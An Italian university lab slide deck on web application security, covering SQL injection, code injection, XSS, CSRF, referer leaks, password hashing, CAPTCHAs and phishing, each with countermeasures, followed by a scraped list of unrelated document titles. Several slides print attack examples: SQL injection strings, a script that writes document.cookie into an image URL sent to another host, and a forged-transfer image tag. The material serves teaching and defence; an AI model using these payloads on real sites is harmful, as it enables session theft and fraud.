Laboratorio di reti II: Problematiche di sicurezza delle reti

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Laboratorio di reti II: Problematiche di sicurezza delle reti"

Transcript

1 Laboratorio di reti II: Problematiche di sicurezza delle reti Stefano Brocchi 30 maggio, 2008 Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

2 La sicurezza nelle reti Nella programmazione web è necessario tenere sempre presenti problematiche di sicurezza Utenti malevoli possono tentare di attaccare applicazioni web per ottenere vantaggi per se o anche solo per causare danni Esistono numerose problematiche da considerare sia per siti web che per altre applicazioni Nel progettare un applicazione è necessario pensare alle possibili debolezze e a come prevenire i relativi attacchi Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

3 Entità di una minaccia Per determinare l entità di una minaccia, considerare i seguenti fattori: La facilità con cui l attacco può essere messo in pratica L entità del danno che è possibile provocare A seconda del tipo di applicazione, è opportuno realizzare diversi livelli di sicurezza Per esempio è importante che in un applicazione di e-commerce non ci debba essere alcuna debolezza. In un applicazione meno cruciale qualche buco che non può portare a grossi danni e che è difficilmente sfruttabile da un attaccante potrebbe essere un problema perdonabile Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

4 Implementare la sicurezza web Quando si realizza la sicurezza in un sito web, si deve cercare quindi il giusto bilanciamento tra sicurezza, usabilità e tempo impiegato per l implementazione In ogni caso è necessario considerare le varie minacce per poter valutare i rischi che si corrono e le eventuali conseguenze di un attacco Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

5 Proprietà da salvaguardare Alcune caratteristiche di un applicazione web che vanno tutelate da problemi di sicurezza sono le seguenti: Integrità dei dati, sia dell applicazione stessa che quelli contenuti nella macchina dove viene eseguita Riservatezza: i dati privati relativi ad un utente o più in generale informazioni contenute sulla macchina contenente l applicazione devono restare riservati Rispetto delle autorizzazioni: un utente non deve avere la possibilità di eseguire operazioni che non è autorizzato ad eseguire, o di eseguirle a nome di altri Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

6 Sicurezza a più livelli Spesso per garantire la sicurezza si effettuano controlli a più livelli dell applicazione In altre parole, un modulo dell applicazione non accetta automaticamente i dati provenienti da un altro modulo ma effettua un ulteriore controllo Un tipico esempio è quello di eseguire controlli sulla correttezza dei dati sia nel codice lato server che come vincoli del database Questi meccanismi vengono ampiamente sfruttati soprattutto, ma non solo, per le applicazioni dove la sicurezza è un fattore critico Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

7 Sicurezza lato utenti Molte problematiche di sicurezza possono essere risolte se l utente che fa uso del sito o dell applicazione prende determinate precauzioni E tuttavia sbagliato presupporre che tuti gli utenti ne siano a conoscenza: implementando un sito web si deve tutelare la sicurezza anche degli utenti meno esperti Cercare di effettuare più controlli possibile per la sicurezza lato applicazione Un esempio: molte webmail hanno un antivirus incorporato, nonostante molti utenti più esperti effettuerebbero comunque per conto loro un controllo per virus o diffiderebbero da allegati sospetti Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

8 Gestione degli accessi e cookie Nei siti web gli accessi vengono solitamente gestiti tramite chiavi di sessione contenute lato client in un cookie Se un attaccante si appropria quindi di una chiave di sessione in un cookie di un determinato utente, questo può accedere al relativo sito come se fosse l utente vittima Così si possono verificare molteplici problemi di sicurezza, come la visualizzazione di informazioni private, l acquisizione di privilegi e permessi o l effettuazione di operazioni a nome di un altro utente Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

9 Code injection Code injection Una delle problematiche relative a siti web riguarda i casi dove del codice inserito da utente viene inserito in del codice da eseguire Un attaccante può avere la possibilità di iniettare del codice maligno che verrà eseguito Uno dei casi più comuni è quello dell SQL injection Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

10 Code injection SQL injection Consideriamo il caso di un login implementato in PHP L utente inserirà nome utente e password in una form, ed il codice PHP estrarrà i parametri ricevuti (solitamente in POST) Per verificare che il login sia corretto, spesso viene controllato se una query come la seguente ottiene risultati: "SELECT * FROM users WHERE username= $user AND password= $pass "; Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

11 Code injection SQL injection Il problema con un implementazione di questo tipo è che i dati sottomessi da un utente possono venir interpretati ed eseguiti come codice SQL Un attaccante che sospetti che l implementazione del sito sia stata realizzata in questo modo,potrebbe inserire come password per garantirsi l accesso la stringa x or 1=1 La query SQL inviata al database sarebbe in questo caso SELECT * FROM users WHERE username= anyusername AND password= x OR 1=1 ; Che restituisce tutta la tabella users visto che la condizione 1=1 è sempre verificata Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

12 Code injection SQL injection In questo caso, presupponendo sempre che il codice lato server non contenga troppi controlli, solitamente viene ottenuto l accesso con l utente relativo alla prima riga della tabella Con un po di tentativi per indovinare i nomi delle colonne, si può ottenere l accesso con uno specifico utente inserendo come password una stringa del tipo x OR username= admin Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

13 Code injection SQL injection Considerando che è possibile creare query annidate e, in alcuni server, inviare molteplici query al server SQL separate da un ;, tramite SQL injection si può inviare pressochè qualsiasi query al DB Un esempio da non provare: xkcd.com Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

14 Code injection SQL injection: soluzione Soluzione al problema dell SQL injection: validare qualsiasi input da utente che andrà a finire come parte di una query SQL Esistono numerosi metodi in molti linguaggi per imporre che una stringa non possa provocare comportamenti anomali Per esempio, inserendo dei caratteri di escape per ogni carattere speciale che può essere interpretato dal linguaggio (nell esempio, l apice) Altrimenti, si possono accettare come input solo stringhe con caratteri alfanumerici o trattini Per questo spesso in nomi utenti e password non sono permessi caratteri speciali come asterischi o apici Per maggiore sicurezza, è oppurtuno accedere al DB dall applicazione web con un utente con diritti ristretti Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

15 Code injection Code injection: PHP o JSP Un altro esempio di code injection si può verificare quando un sito permette di sottomettere codice HTML che verrà poi visualizzato Per esempio in molti forum viene permesso di inserire nei post codice HTML per permettere una formattazione ed un aspetto del testo configurabile Il problema si pone anche quando all utente viene permesso di eseguire l upload di un file che poi verrà pubblicato in rete In questo caso può essere possibile inserire codice PHP o JSP che poi verrà eseguito dal server quando la pagina contenente il codice viene richiesta Per esempio sarebbe possibile sottomettere <?php function evilfunction() {... } evilfunction();?> Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

16 Code injection Code injection: PHP o JSP Soluzione: come per l SQL injection, validare ogni input da utente Sostituire ad esempio ad ogni simbolo < la sequenza di escape < Può essere inoltre una buona idea eseguire il server web da un utente con permessi limitati, in modo che anche nel caso qualche falla di sicurezza sfugga al controllo il danno provocato sia limitato Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

17 Code injection Code injection: problematiche Per probletatiche di code injection non è sufficiente eseguire validazioni lato client tramite Javascript o Applet Non si ha mai il controllo del lato client: un utente malevolo può manipolare liberamente i parametri in uscita tramite vari programmi Per lo stesso motivo, non è sufficiente limitare le scelte nei form tramite menu a tendina, se poi non ci sono opportuni controlli lato server Una volta che il lato server è ben implementato, controlli lato client sono comunque molto utili in quanto permettono ad un utente di correggere dati non validi senza ricaricare tutta la pagina Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

18 Cross site scripting Problematiche di sicurezza delle reti Code injection Un altra problematica di code injection più sottile è il cross site scripting (XSS) Questa si può verificare quando si può sottomettere codice HTML in un sito che verrà visualizzato da altri utenti Questo succede per esempio nei forum ma anche nelle caselle di posta consultabili via web, in quanto nelle è consentito il codice HTML Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

19 Cross site scripting Cross site scripting L obiettivo del XSS tipicamente è quello di appropriarsi del cookie di accesso di un utente al sito in questione Il codice Javascript eseguito ha accesso ai cookie del sito stesso Al codice JS non viene permesso di collegarsi ad altri siti se non quello di origine, ma il browser può essere indotto ad inviare dati ad un terzo sito tramite determinati tag HTML come IMG Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

20 Cross site scripting Cross site scripting Tramite il tag IMG è necessariamente permesso l accesso a immagini su altri domini Per ottenere i cookie di un utente, avendo a disposizione un dominio è possibile usare un codice simile al seguente: <script type= text/javascript > document.write("<img src= + document.cookie + " >"); </script> Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

21 Cross site scripting Cross site scripting A questo punto il server può salvare il valore del cookie ed inviarlo all attaccante che può accedere al sito bersaglio con le credenziali della vittima Può essere implementato uno script che salvi il parametro in GET prima di restituire l immagine, oppure semplicemente il valore del cookie può essere letto nel log delle richieste del server Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

22 Cross site scripting Cross site scripting: soluzioni Soluzioni per il cross site scripting: Per siti che premettono di inserire HTML, non permettere l inserimento di tag <SCRIPT> Eseguire controlli di validazione accurati. Rimuovere tutte le occorrenze di <SCRIPT> per esempio non è sufficiente: l attaccante potrebbe inserire la stringa <SCR<SCRIPT>IPT> Nelle mail in HTML, non permettere l esecuzione di script oppure negare l accesso a immagini esterne al sito Per una maggiore sicurezza, cambiare periodicamente il valore del cookie utilizzato per l accesso alla sessione Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

23 Cross site request forgery Cross-site request forgery Un altro tipo di attacco simile al XSS è il cross-site request forgery (CSRF, letto Sea-Surf) Questo tipo di attacco punta a far eseguire delle operazioni a cui non si avrebbe accesso ad un utente autorizzato I presupposti necessari sono i seguenti Si ha la possibilità di sottomettere codice HTML ad una vittima tramite mail o siti vulnerabili che lo permettono La vittima possiede un cookie che permette l accesso ad una risorsa al quale l attaccante vuole accedere Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

24 Cross site request forgery Cross-site request forgery Di nuovo, tramite il tag IMG si induce la vittima a mandare richieste HTTP formulate dall attaccante ad un terzo sito Tali richieste rappresentano l azione che l attaccante vuole realizzare tramite le autorizzazioni concesse alla vittima Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

25 Cross site request forgery Cross-site request forgery Un esempio di CSRF. L utente A è loggato al sito per l accesso alle sue operazioni bancarie Il sito contiene un form per i versamenti che alla sottomissione dei dati richiede una pagina del tipo importo=...&destinatario=... L utente B invia ad A una mail con il codice <IMG src= versamento?importo=1000e&destinatario=b > Quando A leggerà la mail, il browser invierà una richiesta HTTP alla pagina web indicata cercando di caricare l immagine Il sito rileverà tramite il cookie che la richiesta arriva da A ed autorizzerà l operazione Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

26 Cross site request forgery Cross-site request forgery: soluzioni Soluzioni contro il CSRF: Come per il XSS, non permettere in forum e webmail la visualizzazione di immagini esterne al sito Impostare la durata dei cookie di accesso ad un tempo limitato Nei form che permettono operazioni importanti, inserire un campo hidden generato a caso ad ogni richiesta; nella pagina sucessiva, autorizzare l operazione solo se sia il cookie sia il parametro nascosto corrispondono Lato utente, eseguire il logout da siti sensibili prima di visitare forum o webmail che si sospetta siano mal implementati Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

27 Problematiche relative all HTTP-referer Problematiche relative al referrer Altre problematiche esistenti sono causate dal campo di intestazione HTTP HTTP-referer Questo campo della richiesta HTTP viene impostato al valore dell URL dal quale è stata fatta la richiesta dalla nuova URL Se in un URL A un utente clicca un link alla URL B, la richiesta HTTP per questo secondo indirizzo conterrà come HTTP-referer l URL A Lo stesso vale per richieste di immagini all interno di una pagina web. Il controllo di questo campo viene a volte utilizzato per impedire l accesso ad una immagine al di fuori del contesto di una determinato sito Questo campo spesso viene utilizzato per sapere da dove arriva il traffico diretto verso il proprio sito Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

28 Problematiche relative all HTTP-referer Problematiche relative al referrer Il campo referrer può causare diversi problemi di filtraggio di informazioni Nel caso l identificativo di sessione di un sito sia propagato tramite GET, questo facendo parte dell URL viene inviato nel campo HTTP-referer ed un sito maligno lo può intercettare e farne uso In alcuni casi si possono generare problemi di privacy, in quanto ad un sito vengono inviate informazioni relative ad una visita ad un altro sito da parte di un utente Sempre nel caso di forum e webmail per esempio, se l URL contiene un identificativo relativo al nome utente grazie ad un immagine esterna si può sapere quali utenti hanno visualizzato la mail (o il post) e quali no Tecnica a volte usata da spammer per capire quali siano le caselle attive Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

29 Problematiche relative all HTTP-referer Problematiche relative al referrer Soluzioni alle problematiche relative al referrer: Se l ID di sessione viene passato tramite GET, cambiarne il valore tra una richiesta e l altra Lato utente, fare attenzione ai link cliccati se l URL contiene informazioni sensibili Ulteriormente, si può evitare di specificare il campo HTTP-referer nelle proprie richieste HTTP tramite apposite impostazioni del browser Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

30 Riservatezza di password Riservatezza delle password nel DB A volte è necessario salvare le password degli utenti in un database ma si vuole impedire che anche persone che hanno accesso al DB (come il personale tecnico) non possano vedere le password Sebbene questa tipologia di persone ha possibilità di maneggiare il database, in certi casi l appropriazione della password può essere una minaccia maggiore Per esempio una modifica del database è rilevabile più facilmente e grazie ai vari log si può solitamente risalire all utente che la ha effettuata. Ottenendo una password invece si può impersonare un altro utente del sistema in modo anonimo Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

31 Riservatezza delle password nel DB Riservatezza di password nei DB: funzioni hash Il problema si risolve tramite l uso di funzioni hash Una funzione hash prende come argomento una stringa e ne restituisce un altra (di solito di lunghezza fissata) che gode delle seguenti proprietà: Data una qualsiasi stringa in uscita dalla funzione, non si conosce alcun modo efficiente per trovare una stringa in entrata corrispondente Le possibilità di comparire delle varie stringhe in uscita sono approssimativamente uguali Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

32 Riservatezza delle password nel DB Riservatezza di password nei DB: funzioni hash Funzioni hash molto note sono MD5 e SHA. Librerie per calcolarle sono fornite per numerosi linguaggi di programmazione Spesso le funzioni hash sono anche utilizzate per verificare l integrità di pacchetti software Per verificare che un pacchetto software distribuito su vari domini estranei al programma non sia stato alterato, viene fornito un codice hash che consente all utente di verificarne l autenticità Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

33 Riservatezza delle password nel DB Riservatezza di password nei DB: soluzione A questo punto, la soluzione al problema è di memorizzare nel database non la password stessa ma il risultato della funzione ad essa applicata Quando un utente richiede un login con una determinata password, si verifica se l hash della password ed il valore nel database corrispondano Con questa tecnica anche vedendo il database non si ha nessuna informazione sulle password usate Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

34 Uso di captcha Problematiche di accesso automatico Un altra problematica di molti siti è di evitare l accesso automatizzato da parte di programmi Si può desiderare per esempio che un numero molto grande di utenti fittizzi vengano registrati automaticamente Può essere inoltre necessario prevenire tentativi di accesso non autorizzati tramite attacchi a forza bruta ad una password da parte di programmi Sebbene tentare tutte le password di una lunghezza abbastanza grande sia proibitivo, questo attacco potrebbe aver successo nei riguardi di password brevi o deboli con l ausilio di un dizionario di password frequenti Una soluzione potrebbe essere di bloccare l account dopo n tentativi, ma questo impedirebbe l accesso anche a chi ne ha diritto Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

35 Uso di captcha CAPTCHA Per risolvere questo problema sono stati creati i CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) Questi consistono in caratteri opportunamente distorti e confusi visualizzati in un immagine che gli attuali programmi non sanno riconoscere Un utente verrà quindi identificato come umano solo se riconosce correttamente la scritta del captcha. Per ogni accesso dovrà essere generata chiaramente una diversa immagine Non tutti i CAPTCHA in circolazione sono inattaccabili, in quanto alcuni possono venir effettivamente decifrati da alcune tecniche. Fidarsi del tutto quindi solo di CAPTCHA opportunamente testati Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

36 Uso di captcha Attacco ai CAPTCHA E stata provata una tecnica per l aggiramento dei CAPTCHA basata sull appoggio su di un altro sito web complice basato sul seguente meccanismo Il programma per l accesso automatizzato richiede l operazione proibita e riceve un CAPTCHA da decifrare Il programma invia il CAPTCHA al sito complice, che richiederà ad uno dei suoi utenti di decifrare il CAPTCHA per poter accedere a del contenuto Se l utente inserisce il codice, il programma lo invierà al sito attaccato ottenendo l accesso Questo tipo di attacco comunque non viene considerato grave in quanto il numero di accessi che si riesce ad ottenere non si avvicina all ordine di grandezza degli accessi possibili tramite una procedura del tutto automatizzata Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

37 Segretezza delle comunicazioni Segretezza delle comunicazioni Un altra problematica della programmazione di reti è quella della segretezza delle comunicazioni Tutto quello che viaggia nella rete da una macchina all altra può essere potenzialmente intercettato e letto Per dati sensibili, è necessario un sistema di crittografia che renda l informazione illeggibile da terzi Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

38 Segretezza delle comunicazioni Uso di protocolli criptati Per questo scopo sono stati creati dei protocolli modificati che fanno uso di algoritmi crittografici Per quanto riguarda HTTP, esiste il protocollo HTTPS. Questo fa uso di HTTP e TCP ma interpone tra questi due un protocollo di cifratura delle informazioni Un altro esempio di protocollo sicuro è SFTP per il trasferimento sicuro dei file Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

39 Phishing Phishing Il phishing è un tentativo di ottenere informazioni riservate di un utente facendogli credere di avere a che fare con un sito affidabile Solitamente si ottiene mascherando un URL ad un sito con un altra. Il sito destinazione potrebbe essere una copia del sito originale in modo da indurre l utente ad inserire dati personali (username e password, numero di carta di credito...) Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

40 Phishing Modalità del phishing Esistono diversi modi per mascherare un URL con un altra. Il più semplice è inserire nel contenuto del tag <a> un link diverso da quello puntato. <a href= > Un altro modo è di utilizzare la chiocciola, che in un URL specifica il nome dell utente. Visto che solitamente non è un informazione necessaria, tutto quello che la precede viene solitamente scartato Se l URL è molto lunga, il sito finale potrebbe non esere facilmente visibile <a href= Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

41 Phishing Modalità del phishing Un altro modo per effettuare il fishing è di utilizzare delle pagine in alcuni siti che effettuano automaticamente una redirezione ad un altro sito specificato tra i parametri Tali pagine vengono a volte utilizzate per conteggiare il numero di click effettuati sui vari link esterni, per esempio fare delle statistiche Es. Per nascondere ulteriormente il vero link, questo a volte viene codificato tramite i caratteri di escape dell HTML Ancora: un sottodominio di un sito malvagio può essere confuso con un dominio affidabile da un utente inesperto, come nell URL >...</a> Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

42 Phishing Phishing: soluzioni Soluzioni al phishing: fortunatamente, molti browser implementano meccanismi che riconoscono se l indirizzo di un link è sospetto e lo segnalano all utente Un altra soluzione è di inviare i link cliccati ad un autorità che esegue questa verifica in remoto Da questa soluzione possono nascere problemi di privacy... Mail che contengono tentativi di phishing vengono spesso individuate dai server di posta o da alcuni antivirus e segnalate come pericolose all utente In alcuni casi, è comunque necessaria dell accortezza lato utente Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

43 Esercizio Esercizio Analizzare le possibili minacce che possono essere messe in atto sul sito del forum Per ognuna di esse, valutare quanto gravi possono essere le conseguenze e con quanta difficoltà la minaccia può essere messa in atto Risolvere i problemi di sicurezza ritenuti più gravi secondo la precedente analisi, facendo in modo che questo pesi meno possibile sulle funzionalità del sito Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, / 43

SOSEBI PAPERMAP2 MODULO WEB MANUALE DELL UTENTE

SOSEBI PAPERMAP2 MODULO WEB MANUALE DELL UTENTE SOSEBI PAPERMAP2 MODULO WEB MANUALE DELL UTENTE S O. S E. B I. P R O D O T T I E S E R V I Z I P E R I B E N I C U L T U R A L I So.Se.Bi. s.r.l. - via dell Artigianato, 9-09122 Cagliari Tel. 070 / 2110311

Dettagli

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità.

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Livello di Pericolosità 3: Login Cracking: Il cracking è il

Dettagli

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS) UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL

Dettagli

Manuale operatore per l utilizzo dell utente di dominio

Manuale operatore per l utilizzo dell utente di dominio Manuale operatore per l utilizzo dell utente di dominio Sommario Manuale operatore per l utilizzo dell utente di dominio... 1 1. Account personale di dominio... 2 2. Account generico di dominio... 2 3.

Dettagli

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti Corso di Sicurezza Informatica Sicurezza del software Ing. Gianluca Caminiti SQL Injection Sommario Premessa sul funzionamento dei siti dinamici SQL Injection: Overview Scenari di attacco: Errata gestione

Dettagli

TeamPortal. Servizi integrati con ambienti Gestionali

TeamPortal. Servizi integrati con ambienti Gestionali TeamPortal Servizi integrati con ambienti Gestionali 12/2013 Accesso da remoto Accesso da remoto Esempio 1 Sul Firewall devono essere aperte le porte 80 : http (o quella assegnata in fase di installazione/configurazione

Dettagli

Guida alla registrazione on-line di un DataLogger

Guida alla registrazione on-line di un DataLogger NovaProject s.r.l. Guida alla registrazione on-line di un DataLogger Revisione 3.0 3/08/2010 Partita IVA / Codice Fiscale: 03034090542 pag. 1 di 17 Contenuti Il presente documento è una guida all accesso

Dettagli

MANUALE PARCELLA FACILE PLUS INDICE

MANUALE PARCELLA FACILE PLUS INDICE MANUALE PARCELLA FACILE PLUS INDICE Gestione Archivi 2 Configurazioni iniziali 3 Anagrafiche 4 Creazione prestazioni e distinta base 7 Documenti 9 Agenda lavori 12 Statistiche 13 GESTIONE ARCHIVI Nella

Dettagli

Manuale Amministratore Legalmail Enterprise. Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise

Manuale Amministratore Legalmail Enterprise. Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise Manuale Amministratore Legalmail Enterprise Manuale ad uso degli Amministratori del Servizio Legalmail Enterprise Pagina 2 di 16 Manuale Amministratore Legalmail Enterprise Introduzione a Legalmail Enterprise...3

Dettagli

Client - Server. Client Web: il BROWSER

Client - Server. Client Web: il BROWSER Client - Server Client Web: il BROWSER Il client Web è un applicazione software che svolge il ruolo di interfaccia fra l utente ed il WWW, mascherando la complessità di Internet. Funzioni principali Inviare

Dettagli

Programmazione Web. Laboratorio 4: PHP e MySQL

Programmazione Web. Laboratorio 4: PHP e MySQL Programmazione Web Laboratorio 4: PHP e MySQL Lavagna elettronica (I) Un unità aziendale di decision making opera per le decisioni di tipo consueto e ripetitivo tramite la procedura seguente: un qualsiasi

Dettagli

Guida di Pro Spam Remove

Guida di Pro Spam Remove Guida di Pro Spam Remove 1) SOMMARIO 2) ISTRUZIONI DI BASE 3) CONFIGURAZIONE 4) FILTRO 5) ARCHIVIO E-MAIL 6) NOTE CONCLUSIVE 1) SOMMARIO Pro Spam Remove è un software che si occupa di bloccare tutto lo

Dettagli

GRUPPO CAMBIELLI. Posta elettronica (Webmail) Consigli di utilizzo

GRUPPO CAMBIELLI. Posta elettronica (Webmail) Consigli di utilizzo GRUPPO CAMBIELLI Posta elettronica (Webmail) Consigli di utilizzo Questo sintetico manuale ha lo scopo di chiarire alcuni aspetti basilari per l uso della posta elettronica del gruppo Cambielli. Introduzione

Dettagli

Le caselle di Posta Certificata attivate da Aruba Pec Spa hanno le seguenti caratteristiche:

Le caselle di Posta Certificata attivate da Aruba Pec Spa hanno le seguenti caratteristiche: 1 di 6 05/01/2011 10.51 Supporto Tecnico Quali sono le caratteristiche di una casella di posta certificata? Come ricevere e consultare messaggi indirizzati alle caselle di posta certificata? Come posso

Dettagli

Titolare del trattamento dei dati innanzi descritto è tsnpalombara.it

Titolare del trattamento dei dati innanzi descritto è tsnpalombara.it Decreto Legislativo 196/2003 Codice in materia di protezione dei dati personali COOKIE POLICY La presente informativa è resa anche ai sensi dell art. 13 del D.Lgs 196/03 Codice in materia di protezione

Dettagli

Una minaccia dovuta all uso dell SNMP su WLAN

Una minaccia dovuta all uso dell SNMP su WLAN Una minaccia dovuta all uso dell SNMP su WLAN Gianluigi Me, gianluigi@wi-fiforum.com Traduzione a cura di Paolo Spagnoletti Introduzione Gli attacchi al protocollo WEP compromettono la confidenzialità

Dettagli

Obiettivo dell esercitazione

Obiettivo dell esercitazione Database e Web - Esercitazioni ASP - Andrea Proli proliand@csr.unibo.it Laboratorio di Basi di Dati A.A. 2005/2006 Obiettivo dell esercitazione L obiettivo finale dell esercitazione è quello di creare

Dettagli

Esempio Cookie Policy

Esempio Cookie Policy Esempio Cookie Policy INFORMATIVA ESTESA SULL USO DEI COOKIE Uso dei cookie cascinaladoria.it o il Sito utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le

Dettagli

SSL: applicazioni telematiche SSL SSL SSL. E-commerce Trading on-line Internet banking... Secure Socket Layer

SSL: applicazioni telematiche SSL SSL SSL. E-commerce Trading on-line Internet banking... Secure Socket Layer : applicazioni telematiche Secure Socket Layer E-commerce Trading on-line Internet banking... Protocollo proposto dalla Netscape Communications Corporation Garantisce confidenzialità e affidabilità delle

Dettagli

La firma digitale CHE COSA E'?

La firma digitale CHE COSA E'? La firma digitale La Firma Digitale è il risultato di una procedura informatica che garantisce l autenticità e l integrità di messaggi e documenti scambiati e archiviati con mezzi informatici, al pari

Dettagli

Mac Application Manager 1.3 (SOLO PER TIGER)

Mac Application Manager 1.3 (SOLO PER TIGER) Mac Application Manager 1.3 (SOLO PER TIGER) MacApplicationManager ha lo scopo di raccogliere in maniera centralizzata le informazioni piu salienti dei nostri Mac in rete e di associare a ciascun Mac i

Dettagli

19. LA PROGRAMMAZIONE LATO SERVER

19. LA PROGRAMMAZIONE LATO SERVER 19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici

Dettagli

Bibliografia: Utenti e sessioni

Bibliografia: Utenti e sessioni Bibliografia: Utenti e sessioni http: protocollo stateless http si appoggia su una connessione tcp e lo scambio nel contesto di una connessione si limita a invio della richiesta, ricezione della risposta.

Dettagli

Alfa Layer S.r.l. Via Caboto, 53 10129 Torino ALFA PORTAL

Alfa Layer S.r.l. Via Caboto, 53 10129 Torino ALFA PORTAL ALFA PORTAL La struttura e le potenzialità della piattaforma Alfa Portal permette di creare, gestire e personalizzare un Portale di informazione in modo completamente automatizzato e user friendly. Tramite

Dettagli

Internet e posta elettronica. A cura di Massimiliano Buschi

Internet e posta elettronica. A cura di Massimiliano Buschi Internet e posta elettronica A cura di Massimiliano Buschi Concetti fondamentali Internet www Tcp/ip Browser Terminologia Esistono un sacco di termini con cui bisogna famigliarizzare http url Link Isp

Dettagli

Manuale Utente Albo Pretorio GA

Manuale Utente Albo Pretorio GA Manuale Utente Albo Pretorio GA IDENTIFICATIVO DOCUMENTO MU_ALBOPRETORIO-GA_1.4 Versione 1.4 Data edizione 04.04.2013 1 TABELLA DELLE VERSIONI Versione Data Paragrafo Descrizione delle modifiche apportate

Dettagli

Nelle reti di calcolatori, le porte (traduzione impropria del termine. port inglese, che in realtà significa porto) sono lo strumento

Nelle reti di calcolatori, le porte (traduzione impropria del termine. port inglese, che in realtà significa porto) sono lo strumento I protocolli del livello di applicazione Porte Nelle reti di calcolatori, le porte (traduzione impropria del termine port inglese, che in realtà significa porto) sono lo strumento utilizzato per permettere

Dettagli

Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress

Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress Copyright Andrea Giavara wppratico.com Modulo 4 Il pannello amministrativo dell'hosting e il database per Wordpress 1. Il pannello amministrativo 2. I dati importanti 3. Creare il database - Cpanel - Plesk

Dettagli

Procedura SMS. Manuale Utente

Procedura SMS. Manuale Utente Procedura SMS Manuale Utente INDICE: 1 ACCESSO... 4 1.1 Messaggio di benvenuto... 4 2 UTENTI...4 2.1 Gestione utenti (utente di Livello 2)... 4 2.1.1 Creazione nuovo utente... 4 2.1.2 Modifica dati utente...

Dettagli

Obiettivi d esame PHP Developer Fundamentals on MySQL Environment

Obiettivi d esame PHP Developer Fundamentals on MySQL Environment Obiettivi d esame PHP Developer Fundamentals on MySQL Environment 1.0 Ambiente di sviluppo 1.1 Web server e database MySQL Comprendere la definizione dei processi che si occupano di fornire i servizi web

Dettagli

GUIDA ALL USO DEL PANNELLO DI GESTIONE SITO WEB

GUIDA ALL USO DEL PANNELLO DI GESTIONE SITO WEB GUIDA ALL USO DEL PANNELLO DI GESTIONE SITO WEB Copyright 2014 Wolters Kluwer Italia Srl 1 Sommario 1 Come accedere al Pannello di gestione... 4 2 del Pannello di gestione del sito web... 5 3 delle sezioni...

Dettagli

CONTENT MANAGEMENT SY STEM

CONTENT MANAGEMENT SY STEM CONTENT MANAGEMENT SY STEM I NDI CE I NTRODUZI ONE Accesso al CMS 1) CONTENUTI 1.1 I nserimento, modifica e cancellazione dei contenuti 1.2 Sezioni, categorie e sottocategorie 2) UTENTI 3) UP LOAD FILES

Dettagli

